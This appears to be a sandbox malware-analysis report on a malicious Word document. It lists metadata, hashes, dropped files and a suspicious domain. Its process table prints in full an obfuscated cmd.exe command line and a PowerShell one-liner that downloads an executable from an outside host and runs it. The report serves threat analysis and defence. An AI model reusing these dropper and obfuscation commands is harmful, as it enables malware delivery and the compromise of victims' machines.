Field | Value |
---|---|
File name | faisonconstruction.doc |
Full analysis | https://app.any.run/tasks/4d1bc35f-a1d0-4ea2-b94b-102a5a6c79ae |
Verdict | Malicious activity |
Analysis date | May 24, 2019, 15:22:56 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/msword |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Chase, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 25 08:50:00 2018, Last Saved Time/Date: Tue Sep 25 08:50:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 20, Security: 0 |
MD5 | E1618EBD97A5654665985EE7040E5C05 |
SHA1 | 0302613603BE5EB44AF95DBF02B4815AACC08129 |
SHA256 | DE1A7AD6E314CD094B6F641E629C35DF99AC94EF3D9D537A24DBB2F24502D258 |
SSDEEP | 3072:zte2dw99fEsVBqDOiEWcYgaG787syQIAjFop:BHdw7fVYqImg+ap |

Extension | Detected type | Score |
---|---|---|
.doc | Microsoft Word document | 54.2 |
.doc | Microsoft Word document (old ver.) | 32.2 |

Metadata field | Value |
---|---|
Title | - |
Subject | - |
Author | Chase |
Keywords | - |
Comments | - |
Template | Normal.dotm |
LastModifiedBy | - |
RevisionNumber | 1 |
Software | Microsoft Office Word |
TotalEditTime | - |
CreateDate | 2018:09:25 07:50:00 |
ModifyDate | 2018:09:25 07:50:00 |
Pages | 1 |
Words | 3 |
Characters | 20 |
Security | None |
CodePage | Windows Cyrillic |
Company | - |
Lines | 1 |
Paragraphs | 1 |
CharCountWithSpaces | 22 |
AppVersion | 14 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | - |
HeadingPairs | |
CompObjUserTypeLen | 32 |
CompObjUserType | Документ Microsoft Word 97-2003 |

PID | Command line | Path | Indicators | Parent process |
---|---|---|---|---|
2688 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\faisonconstruction.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
1472 | CMd /V^:^O/C"s^e^t @^+^`=^59^3^ 1^95^ 19^0^ ^103 0^35 ^9^3^0^ ^1^3^5 ^953^ ^9^10^ 5^30 951 ^5^03^ 5^90 ^190^ ^0^5^9 ^1^3^9^ 359 ^503^}^3^95^}90^1^{^15^3^h95^1c1^35^t5^10a^9^3^5c5^1^9^}^53^9^;^0^19^k^5^9^0^a^1^0^3e309r3^9^5b5^01;0^13R103^h5^3^0t905$^01^5^ 519m^19^3e9^51t519^I^5^90^-3^0^9^e03^5^k031^o^9^35v^135n31^0^I^5^09;^105)9^03R^9^50^h95^1t931^$351 ^3^09^,3^10^a3^1^9^w9^5^0^i^51^0$9^0^3(91^0e031^l^531i^59^3F1^9^0d^0^5^3^a^39^5o^59^0^l10^9n^9^50^w0^31o^190D^9^01.0^31h09^1^s591^z91^0$5^9^1{^0^1^3^y903r5^0^9t0^91{9^03)^059c91^0w^903I3^1^9^$^95^1^ 35^0n935i^19^5^ 93^1^a5^3^9w103^i5^3^0^$^01^9(5^31^h109c^90^5a^0^93e^0^9^3r^593^o^1^5^9^f^953^;901'95^3e^51^0x^90^1e^9^15^.3^9^5^'10^3^+^135^a^05^3^Z930M3^95$0^19^+^03^5'5^31^\590'^0^51^+3^0^5c0^5^9^i9^15^l^305b0^39^u1^95p^9^10:195v93^1n^019e^5^93^$3^90=^950R9^53h90^1^t^5^9^3^$^1^9^0;^9^3^0'31^57195^3^53^9'5^93^ 105^=3^05 1^93a0^35^Z3^10M^1^5^0$9^1^5;15^9)19^3'531^@03^1^'^0^9^1(^359^t^03^1i531l^5^30p^19^3^S35^1^.130'9^10^291^3t^9^53^x35^1.1^0^97039o0^5^1^j^359e^9^1^0r03^1=5^19l^139?^0^93p31^0h0^3^9p13^0^.^15^3s^15^9^o103p19^5d0^13o51^3l^5^1^0/1^35E^05^1^X^351M^93^1/3^5^9m3^0^1^o^1^3^0c359^.^19^3^q01^9p^3^09o^05^9w9^31^i^035^d^3^90^k9^10p^5^9^3a^0^35^o^9^3^5^e391^i^3^15q509o^910^w13^9^k^35^1j53^1^d9^53/^3^1^5/^9^1^0^:^3^9^1p^3^09t^0^1^5t153^h159'^1^03=350c0^19^w309I593$^530^;5^3^1t^019n9^0^5e^3^9^5i091l59^0C9^13^b091e135W3^05^.913^t59^1e03^9N^9^5^1^ ^05^1^t0^35c5^03^e^5^9^3j193b^1^93o0^9^3-139w^095^e^9^3^1n^5^3^0=3^15h3^91s3^50^z^31^9$^0^5^1^ 3^19^l^19^5l^01^3e^1^0^5^h5^0^3^s^150r^931e513^w15^9^o^1^39^p&&^f^or /^L %^t ^in (1^063^,^-4^,^3)^do ^s^et ^.*^'=!^.*^'!!@^+^`:~%^t,1!&&^i^f %^t ^le^q ^3 ca^l^l %^.*^':^~5%" | C:\Windows\system32\CMd.exe | — | WINWORD.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3972 | powershell $zsh=new-object Net.WebClient;$Iwc='http://djkwoqieoapkdiwopq.com/MXE/lodpos.php?l=rejo7.xt2'.Split('@');$MZa = '37';$thR=$env:public+'\'+$MZa+'.exe';foreach($iwa in $Iwc){try{$zsh.DownloadFile($iwa, $thR);Invoke-Item $thR;break;}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |

PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4058.tmp.cvr | — | — | — |
3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GX4B8RYH0PCDUIE84Z9P.temp | — | — | — |
2688 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 8CF4B99D86AD2C91E25F7D921404AF08 | C71FCB563A60568ED4A3CC029F6FC631E9786D0AACFDB401A8DB9FE46803F35F |
3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134b74.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$isonconstruction.doc | pgc | 301D0595EC169D51F4CD01F19AB4330E | 7344AC1F01B50D076C57C3AC8612ECA7D7FBC723F9412A72C0C6FE5E503EF407 |

Domain | IP | Reputation |
---|---|---|
djkwoqieoapkdiwopq.com | | suspicious |